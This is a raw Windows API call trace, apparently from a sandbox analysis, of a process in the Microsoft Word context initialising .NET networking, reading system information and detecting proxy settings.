[0044.033] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE", nBufferLength=0x105, lpBuffer=0x231ae4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE", lpFilePart=0x0) returned 0x3b
[0044.033] GetCurrentProcess () returned 0xffffffffffffffff
[0044.033] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae6c8 | out: TokenHandle=0x231ae6c8*=0xa94) returned 1
[0044.034] GetCurrentProcess () returned 0xffffffffffffffff
[0044.034] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae6c8 | out: TokenHandle=0x231ae6c8*=0xa90) returned 1
[0044.035] GetCurrentProcess () returned 0xffffffffffffffff
[0044.035] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae468 | out: TokenHandle=0x231ae468*=0xa98) returned 1
[0044.036] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.config" (normalized: "c:\\program files\\microsoft office\\root\\office16\\winword.config"), fInfoLevelId=0x0, lpFileInformation=0x231ae510 | out: lpFileInformation=0x231ae510*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0044.037] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.config", nBufferLength=0x105, lpBuffer=0x231ae060, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.config", lpFilePart=0x0) returned 0x3e
[0044.037] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.config" (normalized: "c:\\program files\\microsoft office\\root\\office16\\winword.config"), fInfoLevelId=0x0, lpFileInformation=0x231ae4c0 | out: lpFileInformation=0x231ae4c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0044.038] GetCurrentProcess () returned 0xffffffffffffffff
[0044.038] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae6c8 | out: TokenHandle=0x231ae6c8*=0xa9c) returned 1
[0044.038] GetCurrentProcess () returned 0xffffffffffffffff
[0044.038] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae6c8 | out: TokenHandle=0x231ae6c8*=0xaa0) returned 1
[0044.062] lstrlenW (lpString="䅁") returned 1
[0044.064] ND_RI2 () returned 0x1
[0044.064] ND_RI2 () returned 0x0
[0044.065] GetCurrentProcess () returned 0xffffffffffffffff
[0044.065] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae348 | out: TokenHandle=0x231ae348*=0xaa4) returned 1
[0044.117] GetCurrentProcess () returned 0xffffffffffffffff
[0044.117] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae348 | out: TokenHandle=0x231ae348*=0xaa8) returned 1
[0044.137] ND_RI2 () returned 0x1
[0044.137] ND_RI2 () returned 0x0
[0044.137] GetCurrentProcess () returned 0xffffffffffffffff
[0044.137] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae478 | out: TokenHandle=0x231ae478*=0xaac) returned 1
[0044.162] GetCurrentProcess () returned 0xffffffffffffffff
[0044.162] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae478 | out: TokenHandle=0x231ae478*=0xab0) returned 1
[0044.173] ND_RI2 () returned 0x1
[0044.174] ND_RI2 () returned 0x0
[0044.174] GetCurrentProcess () returned 0xffffffffffffffff
[0044.174] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae3b8 | out: TokenHandle=0x231ae3b8*=0xab4) returned 1
[0044.178] GetCurrentProcess () returned 0xffffffffffffffff
[0044.179] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae3b8 | out: TokenHandle=0x231ae3b8*=0xab8) returned 1
[0044.184] GetCurrentProcess () returned 0xffffffffffffffff
[0044.185] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae9f8 | out: TokenHandle=0x231ae9f8*=0xabc) returned 1
[0044.209] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x231acab8 | out: phkResult=0x231acab8*=0xac4) returned 0x0
[0044.212] RegQueryValueExW (in: hKey=0xac4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x231aca3c, lpData=0x0, lpcbData=0x231aca38*=0x0 | out: lpType=0x231aca3c*=0x1, lpData=0x0, lpcbData=0x231aca38*=0xe) returned 0x0
[0044.213] CoTaskMemAlloc (cb=0x12) returned 0x2d15b80
[0044.213] RegQueryValueExW (in: hKey=0xac4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x231aca0c, lpData=0x2d15b80, lpcbData=0x231aca08*=0xe | out: lpType=0x231aca0c*=0x1, lpData="Client", lpcbData=0x231aca08*=0xe) returned 0x0
[0044.213] CoTaskMemFree (pv=0x2d15b80)
[0044.213] RegCloseKey (hKey=0xac4) returned 0x0
[0044.253] CoTaskMemAlloc (cb=0xcd0) returned 0x7dca9b0
[0044.253] RasEnumConnectionsW (in: param_1=0x7dca9b0, param_2=0x231aea4c, param_3=0x231aea48 | out: param_1=0x7dca9b0, param_2=0x231aea4c, param_3=0x231aea48) returned 0x0
[0044.266] CoTaskMemFree (pv=0x7dca9b0)
[0044.272] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x231ae858 | out: lpWSAData=0x231ae858) returned 0
[0044.276] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0xae8
[0044.304] setsockopt (s=0xae8, level=65535, optname=128, optval="\x01", optlen=4) returned -1
[0044.304] closesocket (s=0xae8) returned 0
[0044.305] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0xae8
[0044.316] setsockopt (s=0xae8, level=65535, optname=128, optval="\x01", optlen=4) returned -1
[0044.316] closesocket (s=0xae8) returned 0
[0044.320] ND_RI2 () returned 0x1
[0044.320] ND_RI2 () returned 0x0
[0044.321] GetCurrentProcess () returned 0xffffffffffffffff
[0044.321] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae0d8 | out: TokenHandle=0x231ae0d8*=0xae8) returned 1
[0044.328] GetCurrentProcess () returned 0xffffffffffffffff
[0044.329] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae0d8 | out: TokenHandle=0x231ae0d8*=0xae4) returned 1
[0044.351] GetCurrentProcessId () returned 0x9b0
[0044.374] CoTaskMemAlloc (cb=0x204) returned 0x5ab8ba0
[0044.374] GetComputerNameW (in: lpBuffer=0x5ab8ba0, nSize=0xa5f2568 | out: lpBuffer="YKYD69Q", nSize=0xa5f2568) returned 1
[0044.374] CoTaskMemFree (pv=0x5ab8ba0)
[0044.375] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x231ae5b8 | out: phkResult=0x231ae5b8*=0xaf4) returned 0x0
[0044.375] RegQueryValueExW (in: hKey=0xaf4, lpValueName="Library", lpReserved=0x0, lpType=0x231ae53c, lpData=0x0, lpcbData=0x231ae538*=0x0 | out: lpType=0x231ae53c*=0x1, lpData=0x0, lpcbData=0x231ae538*=0x1c) returned 0x0
[0044.375] CoTaskMemAlloc (cb=0x20) returned 0x7cdd8a0
[0044.375] RegQueryValueExW (in: hKey=0xaf4, lpValueName="Library", lpReserved=0x0, lpType=0x231ae50c, lpData=0x7cdd8a0, lpcbData=0x231ae508*=0x1c | out: lpType=0x231ae50c*=0x1, lpData="netfxperf.dll", lpcbData=0x231ae508*=0x1c) returned 0x0
[0044.375] CoTaskMemFree (pv=0x7cdd8a0)
[0044.375] RegQueryValueExW (in: hKey=0xaf4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x231ae53c, lpData=0x0, lpcbData=0x231ae538*=0x0 | out: lpType=0x231ae53c*=0x4, lpData=0x0, lpcbData=0x231ae538*=0x4) returned 0x0
[0044.376] RegQueryValueExW (in: hKey=0xaf4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x231ae540, lpData=0x231ae53c, lpcbData=0x231ae538*=0x4 | out: lpType=0x231ae540*=0x4, lpData=0x231ae53c*=0x1, lpcbData=0x231ae538*=0x4) returned 0x0
[0044.376] RegQueryValueExW (in: hKey=0xaf4, lpValueName="First Counter", lpReserved=0x0, lpType=0x231ae53c, lpData=0x0, lpcbData=0x231ae538*=0x0 | out: lpType=0x231ae53c*=0x4, lpData=0x0, lpcbData=0x231ae538*=0x4) returned 0x0
[0044.376] RegQueryValueExW (in: hKey=0xaf4, lpValueName="First Counter", lpReserved=0x0, lpType=0x231ae540, lpData=0x231ae53c, lpcbData=0x231ae538*=0x4 | out: lpType=0x231ae540*=0x4, lpData=0x231ae53c*=0x137a, lpcbData=0x231ae538*=0x4) returned 0x0
[0044.376] RegCloseKey (hKey=0xaf4) returned 0x0
[0044.379] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x231ae578 | out: phkResult=0x231ae578*=0xaf4) returned 0x0
[0044.379] RegQueryValueExW (in: hKey=0xaf4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x231ae4fc, lpData=0x0, lpcbData=0x231ae4f8*=0x0 | out: lpType=0x231ae4fc*=0x4, lpData=0x0, lpcbData=0x231ae4f8*=0x4) returned 0x0
[0044.379] RegQueryValueExW (in: hKey=0xaf4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x231ae500, lpData=0x231ae4fc, lpcbData=0x231ae4f8*=0x4 | out: lpType=0x231ae500*=0x4, lpData=0x231ae4fc*=0x3, lpcbData=0x231ae4f8*=0x4) returned 0x0
[0044.379] RegQueryValueExW (in: hKey=0xaf4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x231ae4fc, lpData=0x0, lpcbData=0x231ae4f8*=0x0 | out: lpType=0x231ae4fc*=0x4, lpData=0x0, lpcbData=0x231ae4f8*=0x4) returned 0x0
[0044.379] RegQueryValueExW (in: hKey=0xaf4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x231ae500, lpData=0x231ae4fc, lpcbData=0x231ae4f8*=0x4 | out: lpType=0x231ae500*=0x4, lpData=0x231ae4fc*=0x20000, lpcbData=0x231ae4f8*=0x4) returned 0x0
[0044.379] RegQueryValueExW (in: hKey=0xaf4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x231ae4fc, lpData=0x0, lpcbData=0x231ae4f8*=0x0 | out: lpType=0x231ae4fc*=0x3, lpData=0x0, lpcbData=0x231ae4f8*=0xaa) returned 0x0
[0044.379] RegQueryValueExW (in: hKey=0xaf4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x231ae4fc, lpData=0xa5f5830, lpcbData=0x231ae4f8*=0xaa | out: lpType=0x231ae4fc*=0x3, lpData=0xa5f5830*, lpcbData=0x231ae4f8*=0xaa) returned 0x0
[0044.382] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
[0044.385] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x231ae4b0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0xaf8
[0044.386] MapViewOfFile (hFileMappingObject=0xaf8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x59b0000
[0044.387] VirtualQuery (in: lpAddress=0x59b0000, lpBuffer=0x231ae4a8, dwLength=0x30 | out: lpBuffer=0x231ae4a8*(BaseAddress=0x59b0000, AllocationBase=0x59b0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
[0044.387] LocalFree (hMem=0x7d2b390) returned 0x0
[0044.387] RegCloseKey (hKey=0xaf4) returned 0x0
[0044.400] GetVersionExW (in: lpVersionInformation=0x231ad480*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x231ad480*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0044.401] GetVersionExW (in: lpVersionInformation=0x231ad450*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x231ad450*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0044.402] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0xa5f6558, cbSid=0x231ae490 | out: pSid=0xa5f6558*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x231ae490) returned 1
[0044.404] CreateMutexW (lpMutexAttributes=0xa5f6780, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0xaf4
[0044.407] WaitForSingleObject (hHandle=0xaf4, dwMilliseconds=0x1f4) returned 0x0
[0044.407] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0xa5f6a98, cbSid=0x231ae3f0 | out: pSid=0xa5f6a98*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x231ae3f0) returned 1
[0044.407] CreateMutexW (lpMutexAttributes=0xa5f6c50, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
[0044.408] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0xafc
[0044.408] WaitForSingleObject (hHandle=0xafc, dwMilliseconds=0x1f4) returned 0x0
[0044.409] ReleaseMutex (hMutex=0xafc) returned 1
[0044.409] CloseHandle (hObject=0xafc) returned 1
[0044.410] GetCurrentProcessId () returned 0x9b0
[0044.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9b0) returned 0xafc
[0044.413] GetProcessTimes (in: hProcess=0xafc, lpCreationTime=0x231ae400, lpExitTime=0x231ae3f8, lpKernelTime=0x231ae3f0, lpUserTime=0x231ae3e8 | out: lpCreationTime=0x231ae400, lpExitTime=0x231ae3f8, lpKernelTime=0x231ae3f0, lpUserTime=0x231ae3e8) returned 1
[0044.413] CloseHandle (hObject=0xafc) returned 1
[0044.414] ReleaseMutex (hMutex=0xaf4) returned 1
[0044.414] CloseHandle (hObject=0xaf4) returned 1
[0044.415] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0xa5f7ab8, cbSid=0x231ae490 | out: pSid=0xa5f7ab8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x231ae490) returned 1
[0044.415] CreateMutexW (lpMutexAttributes=0xa5f7c70, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0xaf4
[0044.416] WaitForSingleObject (hHandle=0xaf4, dwMilliseconds=0x1f4) returned 0x0
[0044.417] ReleaseMutex (hMutex=0xaf4) returned 1
[0044.417] CloseHandle (hObject=0xaf4) returned 1
[0044.417] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0xa5f8ad8, cbSid=0x231ae490 | out: pSid=0xa5f8ad8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x231ae490) returned 1
[0044.417] CreateMutexW (lpMutexAttributes=0xa5f8c90, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0xaf4
[0044.417] WaitForSingleObject (hHandle=0xaf4, dwMilliseconds=0x1f4) returned 0x0
[0044.418] ReleaseMutex (hMutex=0xaf4) returned 1
[0044.418] CloseHandle (hObject=0xaf4) returned 1
[0044.418] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0xa5f98f0, cbSid=0x231ae490 | out: pSid=0xa5f98f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x231ae490) returned 1
[0044.418] CreateMutexW (lpMutexAttributes=0xa5f9aa8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0xaf4
[0044.418] WaitForSingleObject (hHandle=0xaf4, dwMilliseconds=0x1f4) returned 0x0
[0044.419] ReleaseMutex (hMutex=0xaf4) returned 1
[0044.419] CloseHandle (hObject=0xaf4) returned 1
[0044.419] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0xa5fa700, cbSid=0x231ae490 | out: pSid=0xa5fa700*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x231ae490) returned 1
[0044.419] CreateMutexW (lpMutexAttributes=0xa5fa8b8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0xaf4
[0044.419] WaitForSingleObject (hHandle=0xaf4, dwMilliseconds=0x1f4) returned 0x0
[0044.419] ReleaseMutex (hMutex=0xaf4) returned 1
[0044.420] CloseHandle (hObject=0xaf4) returned 1
[0044.421] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0xa5fb510, cbSid=0x231ae440 | out: pSid=0xa5fb510*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x231ae440) returned 1
[0044.421] CreateMutexW (lpMutexAttributes=0xa5fb6c8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0xaf4
[0044.421] WaitForSingleObject (hHandle=0xaf4, dwMilliseconds=0x1f4) returned 0x0
[0044.422] ReleaseMutex (hMutex=0xaf4) returned 1
[0044.422] CloseHandle (hObject=0xaf4) returned 1
[0044.422] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0xa5fc338, cbSid=0x231ae440 | out: pSid=0xa5fc338*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x231ae440) returned 1
[0044.422] CreateMutexW (lpMutexAttributes=0xa5fc4f0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0xaf4
[0044.422] WaitForSingleObject (hHandle=0xaf4, dwMilliseconds=0x1f4) returned 0x0
[0044.423] ReleaseMutex (hMutex=0xaf4) returned 1
[0044.423] CloseHandle (hObject=0xaf4) returned 1
[0044.423] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0xa5fd130, cbSid=0x231ae440 | out: pSid=0xa5fd130*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x231ae440) returned 1
[0044.423] CreateMutexW (lpMutexAttributes=0xa5fd2e8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0xaf4
[0044.423] WaitForSingleObject (hHandle=0xaf4, dwMilliseconds=0x1f4) returned 0x0
[0044.423] ReleaseMutex (hMutex=0xaf4) returned 1
[0044.423] CloseHandle (hObject=0xaf4) returned 1
[0044.424] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0xa5fdf38, cbSid=0x231ae440 | out: pSid=0xa5fdf38*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x231ae440) returned 1
[0044.424] CreateMutexW (lpMutexAttributes=0xa5fe0f0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0xaf4
[0044.424] WaitForSingleObject (hHandle=0xaf4, dwMilliseconds=0x1f4) returned 0x0
[0044.424] ReleaseMutex (hMutex=0xaf4) returned 1
[0044.424] CloseHandle (hObject=0xaf4) returned 1
[0044.425] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0xa5fed38, cbSid=0x231ae440 | out: pSid=0xa5fed38*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x231ae440) returned 1
[0044.425] CreateMutexW (lpMutexAttributes=0xa5feef0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0xaf4
[0044.425] WaitForSingleObject (hHandle=0xaf4, dwMilliseconds=0x1f4) returned 0x0
[0044.425] ReleaseMutex (hMutex=0xaf4) returned 1
[0044.425] CloseHandle (hObject=0xaf4) returned 1
[0044.466] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xaf4
[0044.466] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xafc
[0044.467] ioctlsocket (in: s=0xaf4, cmd=-2147195266, argp=0x231aea78 | out: argp=0x231aea78) returned 0
[0044.468] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xb00
[0044.468] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb04
[0044.468] ioctlsocket (in: s=0xb00, cmd=-2147195266, argp=0x231aea78 | out: argp=0x231aea78) returned 0
[0044.469] WSAIoctl (in: s=0xaf4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x231ae9f0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x231ae9f0, lpOverlapped=0x0) returned -1
[0044.470] CoTaskMemAlloc (cb=0x204) returned 0x5ab8db0
[0044.470] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x5ab8db0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
[0044.470] CoTaskMemFree (pv=0x5ab8db0)
[0044.473] WSAEventSelect (s=0xaf4, hEventObject=0xafc, lNetworkEvents=512) returned 0
[0044.474] WSAIoctl (in: s=0xb00, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x231ae9f0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x231ae9f0, lpOverlapped=0x0) returned -1
[0044.474] CoTaskMemAlloc (cb=0x204) returned 0x5ab8db0
[0044.474] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x5ab8db0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
[0044.474] CoTaskMemFree (pv=0x5ab8db0)
[0044.474] WSAEventSelect (s=0xb00, hEventObject=0xb04, lNetworkEvents=512) returned 0
[0044.474] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb08
[0044.474] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0xb08, param_3=0x3) returned 0x0
[0044.480] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x231aeb30 | out: phkResult=0x231aeb30*=0xb1c) returned 0x0
[0044.481] RegOpenKeyExW (in: hKey=0xb1c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x231aea18 | out: phkResult=0x231aea18*=0xb18) returned 0x0
[0044.481] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb28
[0044.482] RegNotifyChangeKeyValue (hKey=0xb18, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xb28, fAsynchronous=1) returned 0x0
[0044.482] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x231aea40 | out: phkResult=0x231aea40*=0xb2c) returned 0x0
[0044.483] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb30
[0044.483] RegNotifyChangeKeyValue (hKey=0xb2c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xb30, fAsynchronous=1) returned 0x0
[0044.483] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x231aea40 | out: phkResult=0x231aea40*=0xb38) returned 0x0
[0044.483] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb3c
[0044.484] RegNotifyChangeKeyValue (hKey=0xb38, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xb3c, fAsynchronous=1) returned 0x0
[0044.484] GetCurrentProcess () returned 0xffffffffffffffff
[0044.484] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae9a8 | out: TokenHandle=0x231ae9a8*=0xb40) returned 1
[0044.488] ND_RI2 () returned 0x1
[0044.488] ND_RI2 () returned 0x0
[0044.488] GetCurrentProcess () returned 0xffffffffffffffff
[0044.488] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae178 | out: TokenHandle=0x231ae178*=0xb44) returned 1
[0044.492] GetCurrentProcess () returned 0xffffffffffffffff
[0044.492] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae178 | out: TokenHandle=0x231ae178*=0xb48) returned 1
[0044.526] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x231aea78 | out: pProxyConfig=0x231aea78) returned 1
[0044.689] SetEvent (hEvent=0xa7c) returned 1
[0044.763] WinHttpDetectAutoProxyConfigUrl (in: dwAutoDetectFlags=0x1, ppwstrAutoConfigUrl=0x231ae9e0 | out: ppwstrAutoConfigUrl=0x231ae9e0*=0x0) returned 0
[0055.792] WinHttpDetectAutoProxyConfigUrl (in: dwAutoDetectFlags=0x2, ppwstrAutoConfigUrl=0x231ae9e0 | out: ppwstrAutoConfigUrl=0x231ae9e0*=0x0) returned 0
[0058.446] ND_RI2 () returned 0x1
[0058.446] ND_RI2 () returned 0x0
[0058.446] GetCurrentProcess () returned 0xffffffffffffffff
[0058.447] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae278 | out: TokenHandle=0x231ae278*=0x420) returned 1
[0058.449] GetCurrentProcess () returned 0xffffffffffffffff
[0058.449] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae278 | out: TokenHandle=0x231ae278*=0xb74) returned 1
[0058.483] SetEvent (hEvent=0xa7c) returned 1
[0058.488] GetACP () returned 0x4e4
